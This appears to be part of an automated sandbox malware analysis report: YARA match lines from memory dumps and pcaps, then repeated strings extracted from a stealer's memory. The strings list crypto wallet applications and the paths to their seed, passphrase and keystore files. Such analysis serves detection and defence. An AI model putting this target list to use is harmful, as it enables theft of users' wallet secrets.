                          Source: Yara matchFile source: 00000000.00000002.1773808493.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1719295113.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.1807882678.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000003.3180525146.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3243376393.0000000000EE1000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000003.2332006204.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1821417963.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1766404144.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.1780762831.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aca7749dee.exe PID: 8168, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aca7749dee.exe PID: 3440, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7b9f3f6834.exe PID: 2896, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 7b9f3f6834.exe PID: 7968, type: MEMORYSTR
                          Source: Yara matchFile source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.3165203944.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2681589371.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3255211624.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000003.2827602995.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000037.00000003.3183348550.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 8040, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.000000000168F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
